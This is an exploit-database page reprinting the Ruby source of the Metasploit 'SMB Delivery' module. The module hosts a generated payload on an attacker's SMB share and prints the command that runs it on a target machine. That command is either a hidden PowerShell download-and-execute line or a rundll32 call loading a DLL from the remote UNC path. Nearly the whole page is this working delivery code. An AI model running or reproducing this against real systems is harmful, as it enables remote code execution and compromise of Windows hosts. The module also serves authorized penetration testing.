SMB Delivery Module

2016.08.06
Credit: Andrew Smith
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

require 'msf/core' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => "SMB Delivery", 'Description' => %q{ This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith', 'Russel Van Tuyl' ], 'References' => [ ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ ['DLL', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }], ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }] ], 'Privileged' => false, 'DisclosureDate' => "Jul 26 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll']) ], self.class) deregister_options('FILE_CONTENTS') end def primer print_status('Run the following command on the target machine:') case target.name when 'PSH' self.file_contents = cmd_psh_payload( payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: download_and_run) when 'DLL' self.file_contents = generate_payload_dll print_line("rundll32.exe #{unc},0") end end end

References:

https://github.com/rapid7/metasploit-framework/pull/3074


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top